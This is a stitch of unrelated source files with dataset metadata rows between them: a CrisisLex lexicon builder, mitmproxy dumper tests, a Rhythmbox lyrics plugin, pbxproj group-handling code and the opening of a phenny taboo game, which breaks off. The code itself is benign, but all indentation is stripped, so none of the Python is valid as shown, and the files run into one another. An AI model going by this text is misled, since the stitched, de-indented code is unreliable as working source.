| -8,725,492,649,563,317,000 | 37.161081 | 191 | 0.58962 | false |
sajao/CrisisLex
|
src-create/build.py
|
1
|
9212
|
# CrisisLex
# Author: Alexandra Olteanu
# Check LICENSE for details about copyright.
#TO-DO: further testing and code cleaning will be done
import nltk
import math
import os
import glob
import networkx as nx
from optparse import OptionParser
from nltk.stem.porter import PorterStemmer
import read
import config
import lexicon
# estimates the maximum weighted independent set formed by terms in the co-occurrence graph
def extract_max_weight_indep_terms_greedy(terms_weights, term_occ, freq, size, min_occ = 0.7):
#build the occ_graph
G = nx.Graph()
l = len(terms_weights)
term_weights = dict(terms_weights)
# add nodes
for t in term_weights:
G.add_node(t, score = term_weights[t])
# add edges
terms = term_weights.keys()
for i,t in enumerate(terms):
if i == l-1:
break
for j in range(i+1,l):
occ = float(term_occ.get((t,terms[j]),0)+term_occ.get((terms[j],t),0))
try:
edge_weight = occ/(freq[t]+freq[terms[j]]-occ)
except:
edge_weight = 0
if edge_weight >= min_occ:
G.add_edge(t,terms[j])
indep = list()
sorted_terms = sorted(term_weights, key=term_weights.get, reverse=True)
while True:
if len(sorted_terms)==0:
break
node = sorted_terms[0]
indep.append(node)
ng = G.neighbors(node)
sorted_terms.remove(node)
for n in ng:
sorted_terms.remove(n)
G.remove_node(n)
G.remove_node(node)
return set(indep[:size])
def get_aggregated_score(args):
return (float(sum(args))/len(args)) * (1. / (1 + math.exp(-( float(len(args)) / 2 ))))
#term_fd is the hit ratio across datasets
def discriminative_coverage(term_weights, hit_ratio = None):
weights = dict()
i = len(term_weights)
l = i
sorted_terms = sorted(term_weights, key=term_weights.get, reverse=True)
# discriminative sorting of quantiles
for t in sorted_terms:
weights[t] = float(i)/l
i-=1
if hit_ratio is None:
return weights
i=l
sorted_terms = sorted(hit_ratio, key=hit_ratio.get, reverse=True)
#normalized by hit-ratio based quantiles
for t in sorted_terms:
if t in term_weights:
weights[t] *= float(i)/l
i-=1
return weights
#generates the lexicon
def get_raw_lexicon(collections, tweets_terms, word_set, tweets_cls, word_occ, fd, mean_function, discriminative_function, use_hit_ratio = False):
occs, fd_all = dict(), nltk.FreqDist()
term_weights = dict()
if use_hit_ratio:
hit_ratios = dict()
for d in collections:
lex = lexicon.Lexicon(tweets_terms[d], word_set[d], tweets_cls[d], [config.positive_class_label, config.negative_class_label], fd[d], config.positive_class_label, 20)
w = discriminative_function(lex)
for occ in word_occ[d]:
occs[occ] = occs.get(occ,0)+word_occ[d][occ]
for fr in fd[d]:
fd_all[fr] = fd_all.get(fr,0)+fd[d][fr]
for term in w:
if term not in term_weights:
term_weights[term] = []
term_weights[term].append(w[term])
if use_hit_ratio:
if term not in hit_ratios:
hit_ratios[term] = []
hit_ratios[term].append(float(lex.terms_frequency_per_class[lex.main_class][term])/lex.class_occ[lex.main_class])
for term in term_weights:
term_weights[term] = mean_function(term_weights[term])
if use_hit_ratio:
for term in term_weights:
hit_ratios[term] = mean_function(hit_ratios[term])
term_weights = discriminative_coverage(term_weights, hit_ratios)
else:
term_weights = discriminative_coverage(term_weights)
return term_weights, occs, fd_all
# reverses the bigrams to their own most frequent form instead of reversing it each word frequent form
def reverse_stemmed_terms_set(stemmed_terms, reverse_stemming, reverse_bigrams_stemming):
terms = []
for w in stemmed_terms:
ws = w.split()
if len(ws)==2:
if (ws[0],ws[1]) in reverse_bigrams_stemming:
rev = reverse_bigrams_stemming[(ws[0],ws[1])]
terms.append(rev[0]+' '+rev[1])
else:
exit("I can't reverse the bi-gram: The \"%s\" bi-gram was not stemmed"%w)
else:
if w in reverse_stemming:
rev = reverse_stemming[w]
terms.append(rev)
else:
exit("I can't reverse the uni-gram: The \"%s\" uni-gram was not stemmed"%w)
return terms
# builds a map that reverse all the stemmed words to the most frequent form
def reverse_stemming(stem_map):
rev_stemming = dict()
for s in stem_map:
max = 0
aux = None
for w in stem_map[s]:
if max < stem_map[s][w]:
max = stem_map[s][w]
aux = w
if aux is None:
print "Generate map: The word was not stemmed", s
print stem_map
exit(0)
rev_stemming[s] = aux
return rev_stemming
def reverse_stemming_bigrams(stem_bigrams_map):
return reverse_stemming(stem_bigrams_map)
# writes the lexicon to file
def save_lexicon(output, scored_terms, term_freq, stem, score):
ps = PorterStemmer()
f1 = open(output, "w")
f2 = open(output[0:len(output)-len(output.split(".")[len(output.split("."))-1])-1]+"_with_scores_%s.txt"%score,"w")
print "Saving the lexicon to file..."
for i,t in enumerate(scored_terms):
print>>f1,t[0]
print>>f2,"%s,%s,%s"%(t[0],t[1],term_freq[stem[i]])
print "The Lexicon is ready!"
if __name__ == "__main__":
#command line options
parser = OptionParser()
parser.add_option("-s", "--terms_scoring", dest="test",
help="The statistical test used to score terms: pmi, chi2 or frequency (in the relevant documents)",
default = "pmi")
parser.add_option("-r", "--hit_ratio", dest="hit_ratio",
help="It normalizes the crisis score according to the number of relevant tweets the term matches on.",
action="store_true", default = False)
parser.add_option("-t","--top_div", dest="optimization",
help="It filters out the terms with lower crisis scores that frequently co-occur with with terms with higher scores",
action="store_true", default = False)
parser.add_option("-o", "--output", dest="output",
help="Write output to FILE. The script will write one term per line",
metavar="FILE", default = "your_lexicon.csv")
parser.add_option("-i", "--input", dest="input",
help="Read from FILE_PATH. The FILE_PATH is expected to point to a director containing one sub-director per collection. "
"It assumes that each collection file contains a header and on each line has: tweet id, tweet text, tweet class (which needs to be among the ones you set in the config.py file)",
metavar="FILE", default = "")
(options, args) = parser.parse_args()
tweets_cls = dict()
tweets_terms = dict()
wd_occ = dict()
word_set = dict()
fd = dict()
stem_map, bigrams_map = dict(), dict()
collections = set()
#set discriminative functions
scoring_options = {'pmi':lexicon.Lexicon.pmi_polarity_metric,'chi2':lexicon.Lexicon.chi2_metric,'frequency':lexicon.Lexicon.frequency_metric}
try:
discriminative_function = scoring_options[options.test]
except:
exit("The terms scoring parameter accepts only the following options: pmi, chi2, frequency")
#extracts terms and computes statistics about them
print "Extracting the data..."
labeled_collections = glob.glob(options.input+"/*")
for l in labeled_collections:
if not os.path.isdir(l):
continue
collection_path = glob.glob(l+"/*")
print collection_path
for c in collection_path:
print c
labeled_data = open(c, "r")
collections.add(c)
tweets_cls[c], tweets_terms[c], wd_occ[c], word_set[c], fd[c] = read.get_terms(labeled_data, stem_map, bigrams_map)
print "Done with reading..."
term_weights, occs, fd_all = get_raw_lexicon(collections, tweets_terms, word_set, tweets_cls, wd_occ, fd, get_aggregated_score, discriminative_function, options.hit_ratio)
if options.optimization:
optimized_terms = extract_max_weight_indep_terms_greedy(term_weights,occs,fd_all,config.lexicon_size)
else:
optimized_terms = set()
top_stemmed = [t for t in sorted(term_weights, key=term_weights.get, reverse=True) if ((not options.optimization) or (options.optimization and t in optimized_terms))][:config.lexicon_size]
top = reverse_stemmed_terms_set(top_stemmed, reverse_stemming(stem_map), reverse_stemming_bigrams(bigrams_map))
sorted_terms_weights = [(top[i],term_weights[t]) for (i,t) in enumerate(top_stemmed)]
save_lexicon(options.output, sorted_terms_weights, fd_all, top_stemmed, options.test)
|
mit
| -338,848,510,721,207,400 | 38.371795 | 201 | 0.615176 | false |
Kriechi/mitmproxy
|
test/mitmproxy/addons/test_dumper.py
|
1
|
8019
|
import io
import shutil
from unittest import mock
import pytest
from mitmproxy import exceptions
from mitmproxy.addons import dumper
from mitmproxy.http import Headers
from mitmproxy.test import taddons
from mitmproxy.test import tflow
from mitmproxy.test import tutils
def test_configure():
d = dumper.Dumper()
with taddons.context(d) as ctx:
ctx.configure(d, dumper_filter="~b foo")
assert d.filter
f = tflow.tflow(resp=True)
assert not d.match(f)
f.response.content = b"foo"
assert d.match(f)
ctx.configure(d, dumper_filter=None)
assert not d.filter
with pytest.raises(exceptions.OptionsError):
ctx.configure(d, dumper_filter="~~")
assert not d.filter
def test_simple():
sio = io.StringIO()
sio_err = io.StringIO()
d = dumper.Dumper(sio, sio_err)
with taddons.context(d) as ctx:
ctx.configure(d, flow_detail=0)
d.response(tflow.tflow(resp=True))
assert not sio.getvalue()
sio.truncate(0)
assert not sio_err.getvalue()
sio_err.truncate(0)
ctx.configure(d, flow_detail=1)
d.response(tflow.tflow(resp=True))
assert sio.getvalue()
sio.truncate(0)
assert not sio_err.getvalue()
sio_err.truncate(0)
ctx.configure(d, flow_detail=1)
d.error(tflow.tflow(err=True))
assert sio.getvalue()
sio.truncate(0)
assert not sio_err.getvalue()
sio_err.truncate(0)
ctx.configure(d, flow_detail=4)
d.response(tflow.tflow(resp=True))
assert sio.getvalue()
sio.truncate(0)
assert not sio_err.getvalue()
sio_err.truncate(0)
ctx.configure(d, flow_detail=4)
d.response(tflow.tflow(resp=True))
assert "<<" in sio.getvalue()
sio.truncate(0)
assert not sio_err.getvalue()
sio_err.truncate(0)
ctx.configure(d, flow_detail=4)
d.response(tflow.tflow(err=True))
assert "<<" in sio.getvalue()
sio.truncate(0)
assert not sio_err.getvalue()
sio_err.truncate(0)
ctx.configure(d, flow_detail=4)
flow = tflow.tflow()
flow.request = tutils.treq()
flow.client_conn = mock.MagicMock()
flow.client_conn.peername[0] = "foo"
flow.response = tutils.tresp(content=None)
flow.is_replay = "response"
flow.response.status_code = 300
d.response(flow)
assert sio.getvalue()
sio.truncate(0)
assert not sio_err.getvalue()
sio_err.truncate(0)
ctx.configure(d, flow_detail=4)
flow = tflow.tflow(resp=tutils.tresp(content=b"{"))
flow.response.headers["content-type"] = "application/json"
flow.response.status_code = 400
d.response(flow)
assert sio.getvalue()
sio.truncate(0)
assert not sio_err.getvalue()
sio_err.truncate(0)
ctx.configure(d, flow_detail=4)
flow = tflow.tflow()
flow.request.content = None
flow.response = tutils.tresp(content=None)
d.response(flow)
assert "content missing" in sio.getvalue()
sio.truncate(0)
assert not sio_err.getvalue()
sio_err.truncate(0)
def test_echo_body():
f = tflow.tflow(client_conn=True, server_conn=True, resp=True)
f.response.headers["content-type"] = "text/html"
f.response.content = b"foo bar voing\n" * 100
sio = io.StringIO()
sio_err = io.StringIO()
d = dumper.Dumper(sio, sio_err)
with taddons.context(d) as ctx:
ctx.configure(d, flow_detail=3)
d._echo_message(f.response, f)
t = sio.getvalue()
assert "cut off" in t
def test_echo_trailer():
sio = io.StringIO()
sio_err = io.StringIO()
d = dumper.Dumper(sio, sio_err)
with taddons.context(d) as ctx:
ctx.configure(d, flow_detail=3)
f = tflow.tflow(client_conn=True, server_conn=True, resp=True)
f.request.headers["content-type"] = "text/html"
f.request.headers["transfer-encoding"] = "chunked"
f.request.headers["trailer"] = "my-little-request-trailer"
f.request.content = b"some request content\n" * 100
f.request.trailers = Headers([(b"my-little-request-trailer", b"foobar-request-trailer")])
f.response.headers["transfer-encoding"] = "chunked"
f.response.headers["trailer"] = "my-little-response-trailer"
f.response.content = b"some response content\n" * 100
f.response.trailers = Headers([(b"my-little-response-trailer", b"foobar-response-trailer")])
d.echo_flow(f)
t = sio.getvalue()
assert "content-type" in t
assert "cut off" in t
assert "some request content" in t
assert "foobar-request-trailer" in t
assert "some response content" in t
assert "foobar-response-trailer" in t
def test_echo_request_line():
sio = io.StringIO()
sio_err = io.StringIO()
d = dumper.Dumper(sio, sio_err)
with taddons.context(d) as ctx:
ctx.configure(d, flow_detail=3, showhost=True)
f = tflow.tflow(client_conn=None, server_conn=True, resp=True)
f.is_replay = "request"
d._echo_request_line(f)
assert "[replay]" in sio.getvalue()
sio.truncate(0)
f = tflow.tflow(client_conn=None, server_conn=True, resp=True)
f.is_replay = None
d._echo_request_line(f)
assert "[replay]" not in sio.getvalue()
sio.truncate(0)
f = tflow.tflow(client_conn=None, server_conn=True, resp=True)
f.request.http_version = "nonstandard"
d._echo_request_line(f)
assert "nonstandard" in sio.getvalue()
sio.truncate(0)
ctx.configure(d, flow_detail=0, showhost=True)
f = tflow.tflow(client_conn=None, server_conn=True, resp=True)
terminalWidth = max(shutil.get_terminal_size()[0] - 25, 50)
f.request.url = "http://address:22/" + ("x" * terminalWidth) + "textToBeTruncated"
d._echo_request_line(f)
assert "textToBeTruncated" not in sio.getvalue()
sio.truncate(0)
class TestContentView:
@pytest.mark.asyncio
async def test_contentview(self):
with mock.patch("mitmproxy.contentviews.auto.ViewAuto.__call__") as va:
va.side_effect = ValueError("")
sio = io.StringIO()
sio_err = io.StringIO()
d = dumper.Dumper(sio, sio_err)
with taddons.context(d) as tctx:
tctx.configure(d, flow_detail=4)
d.response(tflow.tflow())
await tctx.master.await_log("content viewer failed")
def test_tcp():
sio = io.StringIO()
sio_err = io.StringIO()
d = dumper.Dumper(sio, sio_err)
with taddons.context(d) as ctx:
ctx.configure(d, flow_detail=3, showhost=True)
f = tflow.ttcpflow()
d.tcp_message(f)
assert "it's me" in sio.getvalue()
sio.truncate(0)
f = tflow.ttcpflow(client_conn=True, err=True)
d.tcp_error(f)
assert "Error in TCP" in sio_err.getvalue()
def test_websocket():
sio = io.StringIO()
sio_err = io.StringIO()
d = dumper.Dumper(sio, sio_err)
with taddons.context(d) as ctx:
ctx.configure(d, flow_detail=3, showhost=True)
f = tflow.twebsocketflow()
d.websocket_message(f)
assert "it's me" in sio.getvalue()
sio.truncate(0)
d.websocket_end(f)
assert "WebSocket connection closed by" in sio.getvalue()
f = tflow.twebsocketflow(client_conn=True, err=True)
d.websocket_error(f)
assert "Error in WebSocket" in sio_err.getvalue()
def test_http2():
sio = io.StringIO()
sio_err = io.StringIO()
d = dumper.Dumper(sio, sio_err)
with taddons.context(d):
f = tflow.tflow(resp=True)
f.response.http_version = b"HTTP/2.0"
d.response(f)
assert "HTTP/2.0 200 OK" in sio.getvalue()
|
mit
| 5,039,793,679,587,431,000 | 31.204819 | 100 | 0.605188 | false |
ruud-v-a/rhythmbox
|
plugins/lyrics/lyrics.py
|
2
|
13937
|
# -*- Mode: python; coding: utf-8; tab-width: 8; indent-tabs-mode: t; -*-
#
# Copyright (C) 2006 Jonathan Matthew
# Copyright (C) 2007 James Livingston
# Copyright (C) 2007 Sirio Bolaños Puchet
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# The Rhythmbox authors hereby grant permission for non-GPL compatible
# GStreamer plugins to be used and distributed together with GStreamer
# and Rhythmbox. This permission is above and beyond the permissions granted
# by the GPL license by which Rhythmbox is covered. If you modify this code
# you may extend this exception to your version of the code, but you are not
# obligated to do so. If you do not wish to do so, delete this exception
# statement from your version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
import os, re
import urllib.request
import rb
from gi.repository import Gtk, Gio, GObject, Peas
from gi.repository import RB
from gi.repository import Gst, GstPbutils
import LyricsParse
from LyricsConfigureDialog import LyricsConfigureDialog
import gettext
gettext.install('rhythmbox', RB.locale_dir())
LYRIC_TITLE_STRIP=["\(live[^\)]*\)", "\(acoustic[^\)]*\)", "\([^\)]*mix\)", "\([^\)]*version\)", "\([^\)]*edit\)", "\(feat[^\)]*\)"]
LYRIC_TITLE_REPLACE=[("/", "-"), (" & ", " and ")]
LYRIC_ARTIST_REPLACE=[("/", "-"), (" & ", " and ")]
STREAM_SONG_TITLE='rb:stream-song-title'
def create_lyrics_view():
tview = Gtk.TextView()
tview.set_wrap_mode(Gtk.WrapMode.WORD)
tview.set_editable(False)
tview.set_left_margin(6)
tview.set_size_request (0, 0)
sw = Gtk.ScrolledWindow()
sw.add(tview)
sw.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.AUTOMATIC)
sw.set_shadow_type(Gtk.ShadowType.IN)
vbox = Gtk.VBox(spacing=12)
vbox.pack_start(sw, True, True, 0)
return (vbox, tview.get_buffer(), tview)
def parse_song_data(db, entry):
(artist, title) = get_artist_and_title(db, entry)
# don't search for 'unknown' when we don't have the artist or title information
if artist == _("Unknown"):
artist = ""
if title == _("Unknown"):
title = ""
# convert to lowercase
artist = artist.lower()
title = title.lower()
# replace ampersands and the like
for exp in LYRIC_ARTIST_REPLACE:
artist = re.sub(exp[0], exp[1], artist)
for exp in LYRIC_TITLE_REPLACE:
title = re.sub(exp[0], exp[1], title)
# strip things like "(live at Somewhere)", "(accoustic)", etc
for exp in LYRIC_TITLE_STRIP:
title = re.sub (exp, '', title)
# compress spaces
title = title.strip()
artist = artist.strip()
return (artist, title)
def get_artist_and_title(db, entry):
stream_song_title = db.entry_request_extra_metadata(entry, STREAM_SONG_TITLE)
if stream_song_title is not None:
(artist, title) = extract_artist_and_title(stream_song_title)
else:
artist = entry.get_string(RB.RhythmDBPropType.ARTIST)
title = entry.get_string(RB.RhythmDBPropType.TITLE)
return (artist, title)
def extract_artist_and_title(stream_song_title):
details = stream_song_title.split('-')
if len(details) > 1:
artist = details[0].strip()
title = details[1].strip()
else:
details = stream_song_title.split('(')
if len(details) > 1:
title = details[0].strip()
artist = details[1].strip(') ')
else:
title = stream_song_title
artist = ""
return (artist, title)
def build_cache_path(artist, title):
settings = Gio.Settings.new("org.gnome.rhythmbox.plugins.lyrics")
folder = settings['folder']
if folder is None or folder == "":
folder = os.path.join(RB.user_cache_dir(), "lyrics")
lyrics_folder = os.path.expanduser (folder)
if not os.path.exists (lyrics_folder):
os.mkdir (lyrics_folder)
artist_folder = os.path.join(lyrics_folder, artist[:128])
if not os.path.exists (artist_folder):
os.mkdir (artist_folder)
return os.path.join(artist_folder, title[:128] + '.lyric')
class LyricGrabber(object):
"""
Fetch lyrics from several sources.
1. Local cache file
2. Lyric tags in file meta data
3. Online services
"""
def __init__(self, db, entry):
self.db = db
self.entry = entry
(self.artist, self.title) = parse_song_data(self.db, self.entry)
self.cache_path = build_cache_path(self.artist, self.title)
def verify_lyric(self):
return os.path.exists(self.cache_path)
def search_lyrics(self, callback, cache_only=False):
"""
Fetch lyrics from cache.
If no cache file exist, tag extraction is tried next.
"""
self.callback = callback
status = self.verify_lyric()
if status:
f = open(self.cache_path, 'rt')
text = f.read()
f.close()
self.callback(text)
elif cache_only:
self.callback(_("No lyrics found"))
else:
self.search_tags()
def search_tags(self):
"""
Initiate fetching meta tags.
Result will be handled in search_tags_result
"""
location = self.entry.get_playback_uri()
self.discoverer = GstPbutils.Discoverer(timeout=Gst.SECOND*3)
self.discoverer.connect('discovered', self.search_tags_result)
self.discoverer.start()
self.discoverer.discover_uri_async(location)
def search_tags_result(self, discoverer, info, error):
"""
Extract lyrics from the file meta data (tags).
If no lyrics tags are found, online services are tried next.
Supported file formats and lyrics tags:
- ogg/vorbis files with "LYRICS" and "SYNCLYRICS" tag
"""
tags = info.get_tags()
if tags is None:
self.search_online()
return
for i in range(tags.get_tag_size("extended-comment")):
(exists, value) = tags.get_string_index("extended-comment", i)
#ogg/vorbis unsynchronized lyrics
if exists and value.startswith("LYRICS"):
text = value.replace("LYRICS=", "")
self.lyrics_found(text)
return
#ogg/vorbis synchronized lyrics
elif exists and value.startswith("SYNCLYRICS"):
text = value.replace("SYNCLYRICS=", "")
self.lyrics_found(text)
return
self.search_online()
def search_online(self):
"""Initiate searching the online lyrics services"""
if self.artist == "" and self.title == "":
self.callback(_("No lyrics found"))
else:
parser = LyricsParse.Parser(self.artist, self.title)
parser.get_lyrics(self.search_online_result)
def search_online_result(self, text):
"""Handle the result of searching online lyrics services"""
if text is not None:
self.lyrics_found(text)
else:
self.callback(_("No lyrics found"))
def lyrics_found(self, text):
f = open(self.cache_path, 'wt')
f.write(text)
f.close()
self.callback(text)
class LyricPane(object):
def __init__(self, db, song_info):
self.db = db
self.song_info = song_info
self.entry = self.song_info.props.current_entry
self.build_path()
def save_lyrics(cache_path, text):
f = open(cache_path, 'wt')
f.write(text)
f.close()
def erase_lyrics(cache_path):
f = open(cache_path, 'w')
f.write("")
f.close()
def save_callback():
buf = self.buffer
startiter = buf.get_start_iter()
enditer = buf.get_end_iter()
text = buf.get_text(startiter, enditer, True)
save_lyrics(self.cache_path, text)
self.get_lyrics()
def edit_callback(widget):
if self.edit.get_active() == 1:
self.tview.set_editable(True)
self.edit.set_label(_("_Save"))
else:
if self.cache_path is not None:
save_callback()
self.tview.set_editable(False)
self.edit.set_label(_("_Edit"))
def discard_callback(widget):
if self.cache_path is not None and os.path.exists(self.cache_path):
os.remove(self.cache_path)
self.get_lyrics()
def clear_callback(widget):
if self.cache_path is not None and os.path.exists (self.cache_path):
erase_lyrics(self.cache_path)
self.get_lyrics()
self.edit = Gtk.ToggleButton(label=_("_Edit"), use_underline=True)
self.edit.connect('toggled', edit_callback)
self.discard = Gtk.Button(label=_("_Search again"), use_underline=True)
self.discard.connect('clicked', discard_callback)
self.clear = Gtk.Button.new_from_stock(Gtk.STOCK_CLEAR)
self.clear.connect('clicked', clear_callback)
self.hbox = Gtk.ButtonBox(orientation=Gtk.Orientation.HORIZONTAL)
self.hbox.set_spacing (6)
self.hbox.set_layout(Gtk.ButtonBoxStyle.END)
self.hbox.add(self.edit)
self.hbox.add(self.clear)
self.hbox.add(self.discard)
self.hbox.set_child_secondary (self.clear, True)
(self.view, self.buffer, self.tview) = create_lyrics_view()
self.view.pack_start(self.hbox, False, False, 0)
self.view.set_spacing(6)
self.view.props.margin = 6
self.view.show_all()
self.page_num = song_info.append_page(_("Lyrics"), self.view)
self.have_lyrics = 0
self.visible = 0
self.entry_change_id = song_info.connect('notify::current-entry', self.entry_changed)
nb = self.view.get_parent()
self.switch_page_id = nb.connect('switch-page', self.switch_page_cb)
#self.get_lyrics()
def build_path(self):
(artist, title) = parse_song_data(self.db, self.entry)
cache_path = build_cache_path(artist, title)
self.cache_path = cache_path
def entry_changed(self, pspec, duh):
self.entry = self.song_info.props.current_entry
self.have_lyrics = 0
if self.visible != 0:
self.build_path()
self.get_lyrics()
def switch_page_cb(self, notebook, page, page_num):
if self.have_lyrics != 0:
return
if page_num != self.page_num:
self.visible = 0
return
self.visible = 1
self.get_lyrics()
def __got_lyrics(self, text):
self.buffer.set_text(text, -1)
def get_lyrics(self):
if self.entry is None:
return
self.buffer.set_text(_("Searching for lyrics..."), -1);
lyrics_grabber = LyricGrabber(self.db, self.entry)
lyrics_grabber.search_lyrics(self.__got_lyrics)
class LyricWindow (Gtk.Window):
def __init__(self, shell):
Gtk.Window.__init__(self)
self.shell = shell
self.set_border_width(12)
close = Gtk.Button.new_from_stock(Gtk.STOCK_CLOSE)
close.connect('clicked', lambda w: self.destroy())
(lyrics_view, buffer, tview) = create_lyrics_view()
self.buffer = buffer
bbox = Gtk.HButtonBox()
bbox.set_layout(Gtk.ButtonBoxStyle.END)
bbox.pack_start(close, True, True, 0)
lyrics_view.pack_start(bbox, False, False, 0)
sp = shell.props.shell_player
self.ppc_id = sp.connect('playing-song-property-changed', self.playing_property_changed)
self.add(lyrics_view)
self.set_default_size(400, 300)
self.show_all()
def destroy(self):
sp = self.shell.props.shell_player
sp.disconnect (self.ppc_id)
Gtk.Window.destroy(self)
def playing_property_changed(self, player, uri, prop, old_val, new_val):
if (prop == STREAM_SONG_TITLE):
self.update_song_lyrics(player.get_playing_entry())
def __got_lyrics(self, text):
self.buffer.set_text (text, -1)
def update_song_lyrics(self, entry):
db = self.shell.props.db
(artist, title) = get_artist_and_title(db, entry)
self.set_title(title + " - " + artist + " - " + _("Lyrics"))
lyrics_grabber = LyricGrabber(db, entry)
lyrics_grabber.search_lyrics(self.__got_lyrics)
class LyricsDisplayPlugin(GObject.Object, Peas.Activatable):
__gtype_name__ = 'LyricsDisplayPlugin'
object = GObject.property(type=GObject.Object)
def __init__ (self):
GObject.Object.__init__ (self)
self.window = None
def do_activate (self):
shell = self.object
self.action = Gio.SimpleAction.new("view-lyrics", None)
self.action.connect("activate", self.show_song_lyrics, shell)
# set accelerator?
window = shell.props.window
window.add_action(self.action)
app = shell.props.application
item = Gio.MenuItem.new(label=_("Song Lyrics"), detailed_action="win.view-lyrics")
app.add_plugin_menu_item("view", "view-lyrics", item)
sp = shell.props.shell_player
self.pec_id = sp.connect('playing-song-changed', self.playing_entry_changed)
self.playing_entry_changed (sp, sp.get_playing_entry ())
self.csi_id = shell.connect('create_song_info', self.create_song_info)
db = shell.props.db
self.lyric_req_id = db.connect_after ('entry-extra-metadata-request::rb:lyrics', self.lyrics_request)
def do_deactivate (self):
shell = self.object
app = shell.props.application
app.remove_plugin_menu_item("view", "view-lyrics")
app.remove_action("view-lyrics")
self.action = None
sp = shell.props.shell_player
sp.disconnect (self.pec_id)
shell.disconnect (self.csi_id)
shell.props.db.disconnect (self.lyric_req_id)
if self.window is not None:
self.window.destroy ()
self.window = None
def show_song_lyrics (self, action, parameter, shell):
if self.window is not None:
self.window.destroy ()
self.window = None
sp = shell.props.shell_player
entry = sp.get_playing_entry ()
if entry is not None:
self.window = LyricWindow(shell)
self.window.connect("destroy", self.window_deleted)
self.window.update_song_lyrics(entry)
def playing_entry_changed (self, sp, entry):
if entry is not None:
self.action.set_enabled (True)
if self.window is not None:
self.window.update_song_lyrics(entry)
else:
self.action.set_enabled (False)
def window_deleted (self, window):
print("lyrics window destroyed")
self.window = None
def create_song_info (self, shell, song_info, is_multiple):
if is_multiple is False:
x = LyricPane(shell.props.db, song_info)
def lyrics_request (self, db, entry):
def lyrics_results(text):
if text:
db.emit_entry_extra_metadata_notify (entry, 'rb:lyrics', text)
lyrics_grabber = LyricGrabber(db, entry)
lyrics_grabber.search_lyrics(lyrics_results)
|
gpl-2.0
| -9,014,837,923,013,151,000 | 27.853002 | 132 | 0.693456 | false |
dayongxie/mod-pbxproj
|
pbxproj/pbxextensions/ProjectGroups.py
|
2
|
6229
|
from pbxproj.pbxsections import *
class ProjectGroups:
"""
This class provides separation of concerns, this class contains all methods related to groups manipulations.
This class should not be instantiated on its own
"""
def __init__(self):
raise EnvironmentError('This class cannot be instantiated directly, use XcodeProject instead')
def add_group(self, name, path=None, parent=None, source_tree=u'<group>'):
"""
Add a new group with the given name and optionally path to the parent group. If parent is None, the group will
be added to the 'root' group.
Additionally the source tree type can be specified, normally it's group.
:param name: Name of the group to be added (visible folder name)
:param path: Path relative to the project where this group points to. If not present, name will match the path
name
:param parent: The PBXGroup that will be the parent of this group. If parent is None, the default 'root' group
will be used as parent
:param source_tree: The type of group to be created
:return: PBXGroup created
"""
group = PBXGroup.create(name=name, path=path, tree=source_tree)
parent = self._get_parent_group(parent)
parent.add_child(group)
self.objects[group.get_id()] = group
return group
def remove_group_by_id(self, group_id, recursive=True):
"""
Remove the group matching the given group_id. If recursive is True, all descendants of this group are also removed.
:param group_id: The group id to be removed
:param recursive: All descendants should be removed as well
:return: True if the element was removed successfully, False if an error occured or there was nothing to remove.
"""
group = self.objects[group_id]
if group is None:
return False
result = True
# iterate over the children and determine if they are file/group and call the right method.
for subgroup_id in list(group.children):
subgroup = self.objects[subgroup_id]
if subgroup is None:
return False
if recursive and isinstance(subgroup, PBXGroup):
result &= self.remove_group_by_id(subgroup.get_id(), recursive)
if isinstance(subgroup, PBXFileReference):
result &= self.remove_file_by_id(subgroup.get_id())
if not result:
return False
del self.objects[group.get_id()]
# remove the reference from any other group object that could be containing it.
for other_group in self.objects.get_objects_in_section(u'PBXGroup'):
other_group.remove_child(group)
return True
def remove_group_by_name(self, group_name, recursive=True):
"""
Remove the groups matching the given name. If recursive is True, all descendants of this group are also removed.
This method could cause the removal of multiple groups that not necessarily are intended to be removed, use with
caution
:param group_name: The group name to be removed
:param recursive: All descendants should be removed as well
:return: True if the element was removed successfully, False otherwise
"""
groups = self.get_groups_by_name(name=group_name)
if groups.__len__() == 0:
return False
for group in groups:
if not self.remove_group_by_id(group.get_id(), recursive):
return False
return True
def get_groups_by_name(self, name, parent=None):
"""
Retrieve all groups matching the given name and optionally filtered by the given parent node.
:param name: The name of the group that has to be returned
:param parent: A PBXGroup object where the object has to be retrieved from. If None all matching groups are returned
:return: An list of all matching groups
"""
groups = self.objects.get_objects_in_section(u'PBXGroup')
groups = [group for group in groups if group.get_name() == name]
if parent:
return [group for group in groups if parent.has_child(group)]
return groups
def get_groups_by_path(self, path, parent=None):
"""
Retrieve all groups matching the given path and optionally filtered by the given parent node.
The path is converted into the absolute path of the OS before comparison.
:param path: The name of the group that has to be returned
:param parent: A PBXGroup object where the object has to be retrieved from. If None all matching groups are returned
:return: An list of all matching groups
"""
groups = self.objects.get_objects_in_section(u'PBXGroup')
groups = [group for group in groups if group.get_path() == path]
if parent:
return [group for group in groups if parent.has_child(group)]
return groups
def get_or_create_group(self, name, path=None, parent=None):
if not name:
return None
groups = self.get_groups_by_name(name, parent)
if groups.__len__() > 0:
return groups[0]
return self.add_group(name, path, parent)
def _get_parent_group(self, parent):
if parent is None:
# search for the mainGroup of the project
project = self.objects[self[u'rootObject']]
if project:
parent = self.objects[project[u'mainGroup']]
if parent is not None:
return parent
# search for the group without name
parent = self.get_groups_by_name(None)
# if there is no parent, create and empty parent group, add it to the objects
if parent.__len__() > 0:
return parent[0]
parent = PBXGroup.create(path=None, name=None)
self.objects[parent.get_id()] = parent
return parent
# it's not a group instance, assume it's an id
if not isinstance(parent, PBXGroup):
return self.objects[parent]
return parent
|
bsd-3-clause
| -8,915,274,105,796,946,000 | 39.448052 | 124 | 0.630599 | false |
relet/phenny-games
|
modules/taboo.py
|
1
|
8756
|
#!/usr/bin/env python
"""a taboo extension for phenny
(c)opyleft 2008-2009 Thomas Hirsch
Licence: GPL"""
import bz2, random, time, yaml, re
from operator import itemgetter
from math import floor
dico = {}
DEFINE_NONE = None
DEFINE_DEFINE = 1 #status codes for the define game
DEFINE_SELECT = 2
commonwords = []
